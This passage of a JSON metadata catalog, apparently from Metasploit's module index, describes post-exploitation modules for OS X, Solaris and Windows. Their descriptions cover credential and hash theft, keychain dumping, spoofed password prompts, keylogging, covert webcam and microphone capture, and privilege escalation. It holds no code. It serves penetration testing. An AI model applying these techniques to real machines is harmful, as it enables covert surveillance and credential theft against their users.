"disclosure_date": "2018-03-21", - "type": "post", - "author": [ - "Sarah Edwards", - "cbrnrd" - ], - "description": "This module exploits a flaw in OSX 10.13 through 10.13.3\n that discloses the passwords of encrypted APFS volumes.\n\n In OSX a normal user can use the 'log' command to view the system\n logs. In OSX 10.13 to 10.13.2 when a user creates an encrypted APFS\n volume the password is visible in plaintext within these logs.", - "references": [ - "URL-https://thehackernews.com/2018/03/macos-apfs-password.html", - "URL-https://www.mac4n6.com/blog/2018/3/21/uh-oh-unified-logs-in-high-sierra-1013-show-plaintext-password-for-apfs-encrypted-external-volumes-via-disk-utilityapp" - ], - "platform": "OSX", - "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r, riscv32be, riscv32le, riscv64be, riscv64le, loongarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:49:28 +0000", - "path": "/modules/post/osx/gather/apfs_encrypted_volume_passwd.rb", - "is_install_path": true, - "ref_name": "osx/gather/apfs_encrypted_volume_passwd", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_osx/gather/autologin_password": { - "name": "OSX Gather Autologin Password as Root", - "fullname": "post/osx/gather/autologin_password", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "joev " - ], - "description": "This module will steal the plaintext password of any user on the machine\n with autologin enabled. 
Root access is required.\n\n When a user has autologin enabled (System Preferences -> Accounts), OSX\n stores their password with an XOR encoding in /private/etc/kcpassword.", - "references": [ - "URL-https://web.archive.org/web/20180408062145/http://www.brock-family.org/gavin/perl/kcpassword.html" - ], - "platform": "OSX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:49:28 +0000", - "path": "/modules/post/osx/gather/autologin_password.rb", - "is_install_path": true, - "ref_name": "osx/gather/autologin_password", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_osx/gather/enum_adium": { - "name": "OS X Gather Adium Enumeration", - "fullname": "post/osx/gather/enum_adium", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "sinn3r " - ], - "description": "This module will collect Adium's account plist files and chat logs from the\n victim's machine. There are three different actions you may choose: ACCOUNTS,\n CHATS, and ALL. Note that to use the 'CHATS' action, make sure you set the regex\n 'PATTERN' option in order to look for certain log names (which consists of a\n contact's name, and a timestamp). The current 'PATTERN' option is configured to\n look for any log created on February 2012 as an example. 
To loot both account\n plists and chat logs, simply set the action to 'ALL'.", - "references": [], - "platform": "OSX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:49:28 +0000", - "path": "/modules/post/osx/gather/enum_adium.rb", - "is_install_path": true, - "ref_name": "osx/gather/enum_adium", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "ACCOUNTS", - "description": "Collect account-related plists" - }, - { - "name": "ALL", - "description": "Collect both account plists and chat logs" - }, - { - "name": "CHATS", - "description": "Collect chat logs with a pattern" - } - ] - }, - "post_osx/gather/enum_airport": { - "name": "OS X Gather Airport Wireless Preferences", - "fullname": "post/osx/gather/enum_airport", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "sinn3r " - ], - "description": "This module will download OS X Airport Wireless preferences from the victim\n machine. 
The preferences file (which is a plist) contains information such as:\n SSID, Channels, Security Type, Password ID, etc.", - "references": [], - "platform": "OSX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:49:28 +0000", - "path": "/modules/post/osx/gather/enum_airport.rb", - "is_install_path": true, - "ref_name": "osx/gather/enum_airport", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_osx/gather/enum_chicken_vnc_profile": { - "name": "OS X Gather Chicken of the VNC Profile", - "fullname": "post/osx/gather/enum_chicken_vnc_profile", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "sinn3r " - ], - "description": "This module will download the \"Chicken of the VNC\" client application's\n profile file,\twhich is used to store other VNC servers' information such\n as the IP and password.", - "references": [], - "platform": "OSX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:49:28 +0000", - "path": "/modules/post/osx/gather/enum_chicken_vnc_profile.rb", - "is_install_path": true, - "ref_name": "osx/gather/enum_chicken_vnc_profile", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_osx/gather/enum_colloquy": { - "name": "OS X Gather Colloquy Enumeration", - "fullname": "post/osx/gather/enum_colloquy", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - 
"sinn3r " - ], - "description": "This module will collect Colloquy's info plist file and chat logs from the\n victim's machine. There are three actions you may choose: INFO, CHATS, and\n ALL. Please note that the CHAT action may take a long time depending on the\n victim machine, therefore we suggest to set the regex 'PATTERN' option in order\n to search for certain log names (which consists of the contact's name, and a\n timestamp). The default 'PATTERN' is configured as \"^alien\" as an example\n to search for any chat logs associated with the name \"alien\".", - "references": [], - "platform": "OSX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:49:28 +0000", - "path": "/modules/post/osx/gather/enum_colloquy.rb", - "is_install_path": true, - "ref_name": "osx/gather/enum_colloquy", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "ACCOUNTS", - "description": "Collect the preferences plists" - }, - { - "name": "ALL", - "description": "Collect both the plists and chat logs" - }, - { - "name": "CHATS", - "description": "Collect chat logs with a pattern" - } - ] - }, - "post_osx/gather/enum_keychain": { - "name": "OS X Gather Keychain Enumeration", - "fullname": "post/osx/gather/enum_keychain", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "ipwnstuff ", - "joev " - ], - "description": "This module presents a way to quickly go through the current user's keychains and\n collect data such as email accounts, servers, and other services. 
Please note:\n when using the GETPASS and GETPASS_AUTO_ACCEPT option, the user may see an authentication\n alert flash briefly on their screen that gets dismissed by a programmatically triggered click.", - "references": [], - "platform": "OSX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": "/modules/post/osx/gather/enum_keychain.rb", - "is_install_path": true, - "ref_name": "osx/gather/enum_keychain", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "screen-effects" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": true, - "actions": [] - }, - "post_osx/gather/enum_messages": { - "name": "OS X Gather Messages", - "fullname": "post/osx/gather/enum_messages", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Geckom " - ], - "description": "This module will collect the Messages sqlite3 database files and chat logs\n from the victim's machine. There are four actions you may choose: DBFILE,\n READABLE, LATEST, and ALL. DBFILE and READABLE will retrieve all messages, and\n LATEST will retrieve the last X number of messages (useful with 2FA). 
Module\n was tested with OS X 10.11 (El Capitan).", - "references": [], - "platform": "OSX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:49:28 +0000", - "path": "/modules/post/osx/gather/enum_messages.rb", - "is_install_path": true, - "ref_name": "osx/gather/enum_messages", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "ALL", - "description": "Collect all Messages data" - }, - { - "name": "DBFILE", - "description": "Collect Messages DB file" - }, - { - "name": "LATEST", - "description": "Collect the latest message" - }, - { - "name": "READABLE", - "description": "Collect Messages DB and download in a readable format" - } - ] - }, - "post_osx/gather/enum_osx": { - "name": "OS X Gather Mac OS X System Information Enumeration", - "fullname": "post/osx/gather/enum_osx", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "This module gathers basic system information from Mac OS X Tiger (10.4), through\n Mojave (10.14).", - "references": [], - "platform": "OSX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:49:28 +0000", - "path": "/modules/post/osx/gather/enum_osx.rb", - "is_install_path": true, - "ref_name": "osx/gather/enum_osx", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_osx/gather/gitignore": { - "name": "Git Ignore Retriever", - 
"fullname": "post/osx/gather/gitignore", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "N!ght Jmp" - ], - "description": "This module finds potentially sensitive items by finding .gitignore files.", - "references": [], - "platform": "OSX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/post/osx/gather/gitignore.rb", - "is_install_path": true, - "ref_name": "osx/gather/gitignore", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_osx/gather/hashdump": { - "name": "OS X Gather Mac OS X Password Hash Collector", - "fullname": "post/osx/gather/hashdump", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez ", - "hammackj ", - "joev " - ], - "description": "This module dumps SHA-1, LM, NT, and SHA-512 Hashes on OSX. 
Supports\n versions 10.3 to 10.14.", - "references": [], - "platform": "OSX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:49:28 +0000", - "path": "/modules/post/osx/gather/hashdump.rb", - "is_install_path": true, - "ref_name": "osx/gather/hashdump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_osx/gather/password_prompt_spoof": { - "name": "OSX Password Prompt Spoof", - "fullname": "post/osx/gather/password_prompt_spoof", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Joff Thyer ", - "joev ", - "Peter Toth " - ], - "description": "Presents a password prompt dialog to a logged-in OSX user.", - "references": [ - "URL-http://blog.packetheader.net/2011/10/fun-with-applescript.html" - ], - "platform": "OSX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:49:28 +0000", - "path": "/modules/post/osx/gather/password_prompt_spoof.rb", - "is_install_path": true, - "ref_name": "osx/gather/password_prompt_spoof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "screen-effects" - ], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_osx/gather/safari_lastsession": { - "name": "OSX Gather Safari LastSession.plist", - "fullname": "post/osx/gather/safari_lastsession", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "sinn3r " - ], - "description": "This module downloads the LastSession.plist 
file from the target machine.\n LastSession.plist is used by Safari to track active websites in the current session,\n and sometimes contains sensitive information such as usernames and passwords.\n\n This module will first download the original LastSession.plist, and then attempt\n to find the credential for Gmail. The Gmail's last session state may contain the\n user's credential if his/her first login attempt failed (likely due to a typo),\n and then the page got refreshed or another login attempt was made. This also means\n the stolen credential might contain typos.", - "references": [ - "URL-http://www.securelist.com/en/blog/8168/Loophole_in_Safari" - ], - "platform": "OSX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:49:28 +0000", - "path": "/modules/post/osx/gather/safari_lastsession.rb", - "is_install_path": true, - "ref_name": "osx/gather/safari_lastsession", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_osx/gather/vnc_password_osx": { - "name": "OS X Display Apple VNC Password", - "fullname": "post/osx/gather/vnc_password_osx", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kevin Gonzalvo " - ], - "description": "This module shows Apple VNC Password from Mac OS X High Sierra.", - "references": [], - "platform": "OSX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:49:28 +0000", - "path": "/modules/post/osx/gather/vnc_password_osx.rb", - "is_install_path": true, - "ref_name": "osx/gather/vnc_password_osx", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ 
- "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_osx/manage/mount_share": { - "name": "OSX Network Share Mounter", - "fullname": "post/osx/manage/mount_share", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Peter Toth ", - "joev " - ], - "description": "This module lists saved network shares and tries to connect to them using stored\n credentials. This does not require root privileges.", - "references": [], - "platform": "OSX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:49:28 +0000", - "path": "/modules/post/osx/manage/mount_share.rb", - "is_install_path": true, - "ref_name": "osx/manage/mount_share", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "LIST", - "description": "Show a list of stored network share credentials" - }, - { - "name": "MOUNT", - "description": "Mount a network shared volume using stored credentials" - }, - { - "name": "UMOUNT", - "description": "Unmount a mounted volume" - } - ] - }, - "post_osx/manage/record_mic": { - "name": "OSX Manage Record Microphone", - "fullname": "post/osx/manage/record_mic", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "joev " - ], - "description": "This module will allow the user to detect (with the LIST action) and\n capture (with the RECORD action) audio inputs on a remote OSX machine.", - "references": [], - "platform": "OSX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 
02:49:28 +0000", - "path": "/modules/post/osx/manage/record_mic.rb", - "is_install_path": true, - "ref_name": "osx/manage/record_mic", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "LIST", - "description": "Show a list of microphones" - }, - { - "name": "RECORD", - "description": "Record from a selected audio input" - } - ] - }, - "post_osx/manage/sonic_pi": { - "name": "OS X Manage Sonic Pi", - "fullname": "post/osx/manage/sonic_pi", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Sam Aaron", - "wvu " - ], - "description": "This module controls Sonic Pi via its local OSC server.\n\n The server runs on 127.0.0.1:4557 and receives OSC messages over UDP.\n\n Yes, this is RCE, but it's local. I suggest playing music. :-)", - "references": [ - "URL-https://sonic-pi.net/", - "URL-https://github.com/samaaron/sonic-pi/wiki/Sonic-Pi-Internals----GUI-Ruby-API", - "URL-http://opensoundcontrol.org/spec-1_0" - ], - "platform": "OSX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:49:28 +0000", - "path": "/modules/post/osx/manage/sonic_pi.rb", - "is_install_path": true, - "ref_name": "osx/manage/sonic_pi", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "audio-effects", - "screen-effects" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "Run", - "description": "Run Sonic Pi code" - }, - { - "name": "Stop", - "description": "Stop all jobs" - } - ] - }, - "post_osx/manage/vpn": { - "name": "OSX VPN Manager", - "fullname": "post/osx/manage/vpn", - "aliases": 
[], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Peter Toth " - ], - "description": "This module lists VPN connections and tries to connect to them using stored credentials.", - "references": [], - "platform": "OSX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:49:28 +0000", - "path": "/modules/post/osx/manage/vpn.rb", - "is_install_path": true, - "ref_name": "osx/manage/vpn", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "CONNECT", - "description": "Connect to a VPN using stored credentials" - }, - { - "name": "DISCONNECT", - "description": "Disconnect from a VPN" - }, - { - "name": "LIST", - "description": "Show a list of VPN connections" - } - ] - }, - "post_osx/manage/webcam": { - "name": "OSX Manage Webcam", - "fullname": "post/osx/manage/webcam", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "joev " - ], - "description": "This module will allow the user to detect installed webcams (with\n the LIST action), take a snapshot (with the SNAPSHOT action), or\n record a webcam and mic (with the RECORD action).", - "references": [], - "platform": "OSX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:49:28 +0000", - "path": "/modules/post/osx/manage/webcam.rb", - "is_install_path": true, - "ref_name": "osx/manage/webcam", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "LIST", - 
"description": "Show a list of webcams" - }, - { - "name": "RECORD", - "description": "Record with the webcam" - }, - { - "name": "SNAPSHOT", - "description": "Take a snapshot with the webcam" - } - ] - }, - "post_solaris/escalate/pfexec": { - "name": "Solaris pfexec Upgrade Shell", - "fullname": "post/solaris/escalate/pfexec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "bcoles " - ], - "description": "This module attempts to upgrade a shell session to UID 0 using pfexec.", - "references": [ - "URL-https://docs.oracle.com/cd/E19253-01/816-4557/prbactm-1/index.html", - "URL-http://www.c0t0d0s0.org/archives/4844-Less-known-Solaris-features-pfexec.html", - "URL-http://solaris.wikia.com/wiki/Providing_root_privileges_with_pfexec" - ], - "platform": "Solaris", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 00:19:25 +0000", - "path": "/modules/post/solaris/escalate/pfexec.rb", - "is_install_path": true, - "ref_name": "solaris/escalate/pfexec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_solaris/escalate/srsexec_readline": { - "name": "Solaris srsexec Arbitrary File Reader", - "fullname": "post/solaris/escalate/srsexec_readline", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-05-07", - "type": "post", - "author": [ - "h00die", - "iDefense" - ], - "description": "This module exploits a vulnerability in NetCommander 3.2.3 and 3.2.5.\n When srsexec is executed in debug (-d) verbose (-v) mode,\n the first line of an arbitrary file can be read due to the suid bit set.\n The most widely accepted exploitation vector is reading /etc/shadow,\n which will reveal root's hash for 
cracking.", - "references": [ - "CVE-2007-2617", - "URL-https://download.oracle.com/sunalerts/1000443.1.html", - "URL-https://www.securityfocus.com/archive/1/468235", - "EDB-30021", - "BID-23915" - ], - "platform": "Solaris", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 00:19:25 +0000", - "path": "/modules/post/solaris/escalate/srsexec_readline.rb", - "is_install_path": true, - "ref_name": "solaris/escalate/srsexec_readline", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_solaris/gather/checkvm": { - "name": "Solaris Gather Virtual Environment Detection", - "fullname": "post/solaris/gather/checkvm", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "This module attempts to determine whether the system is running\n inside of a virtual environment and if so, which one. 
This\n module supports detection of Solaris Zone, VMWare, VirtualBox, Xen,\n and QEMU/KVM.", - "references": [], - "platform": "Solaris", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 00:19:25 +0000", - "path": "/modules/post/solaris/gather/checkvm.rb", - "is_install_path": true, - "ref_name": "solaris/gather/checkvm", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_solaris/gather/enum_packages": { - "name": "Solaris Gather Installed Packages", - "fullname": "post/solaris/gather/enum_packages", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "Post module to enumerate installed packages on a Solaris system.", - "references": [], - "platform": "Solaris", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 00:19:25 +0000", - "path": "/modules/post/solaris/gather/enum_packages.rb", - "is_install_path": true, - "ref_name": "solaris/gather/enum_packages", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_solaris/gather/enum_services": { - "name": "Solaris Gather Configured Services", - "fullname": "post/solaris/gather/enum_services", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "Post module to enumerate services on a Solaris system.", - "references": [], - "platform": "Solaris", - "arch": "", - "rport": null, - 
"autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 00:19:25 +0000", - "path": "/modules/post/solaris/gather/enum_services.rb", - "is_install_path": true, - "ref_name": "solaris/gather/enum_services", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_solaris/gather/hashdump": { - "name": "Solaris Gather Dump Password Hashes for Solaris Systems", - "fullname": "post/solaris/gather/hashdump", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "Post module to dump the password hashes for all users on a Solaris system.", - "references": [], - "platform": "Solaris", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 00:19:25 +0000", - "path": "/modules/post/solaris/gather/hashdump.rb", - "is_install_path": true, - "ref_name": "solaris/gather/hashdump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/capture/keylog_recorder": { - "name": "Windows Capture Keystroke Recorder", - "fullname": "post/windows/capture/keylog_recorder", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez ", - "Josh Hale " - ], - "description": "This module can be used to capture keystrokes. To capture keystrokes when the session is running\n as SYSTEM, the MIGRATE option must be enabled and the CAPTURE_TYPE option should be set to one of\n Explorer, Winlogon, or a specific PID. 
To capture the keystrokes of the interactive user, the\n Explorer option should be used with MIGRATE enabled. Keep in mind that this will demote this session\n to the user's privileges, so it makes sense to create a separate session for this task. The Winlogon\n option will capture the username and password entered into the logon and unlock dialog. The LOCKSCREEN\n option can be combined with the Winlogon CAPTURE_TYPE to for the user to enter their clear-text\n password. It is recommended to run this module as a job, otherwise it will tie up your framework user interface.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/capture/keylog_recorder.rb", - "is_install_path": true, - "ref_name": "windows/capture/keylog_recorder", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/capture/lockout_keylogger": { - "name": "Windows Capture Winlogon Lockout Credential Keylogger", - "fullname": "post/windows/capture/lockout_keylogger", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "mubix ", - "cg" - ], - "description": "This module migrates and logs Microsoft Windows user's passwords via\n Winlogon.exe using idle time and natural system changes to give a\n false sense of security to the user.", - "references": [ - "URL-http://blog.metasploit.com/2010/12/capturing-windows-logons-with.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/capture/lockout_keylogger.rb", - 
"is_install_path": true, - "ref_name": "windows/capture/lockout_keylogger", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "screen-effects" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/escalate/droplnk": { - "name": "Windows Escalate SMB Icon LNK Dropper", - "fullname": "post/windows/escalate/droplnk", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "mubix " - ], - "description": "This module drops a shortcut (LNK file) that has a ICON reference\n existing on the specified remote host, causing SMB and WebDAV\n connections to be initiated from any user that views the shortcut.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/escalate/droplnk.rb", - "is_install_path": true, - "ref_name": "windows/escalate/droplnk", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/escalate/getsystem": { - "name": "Windows Escalation", - "fullname": "post/windows/escalate/getsystem", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "hdm " - ], - "description": "This module uses the `getsystem` command to escalate the current session to the SYSTEM account using various\n techniques.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": 
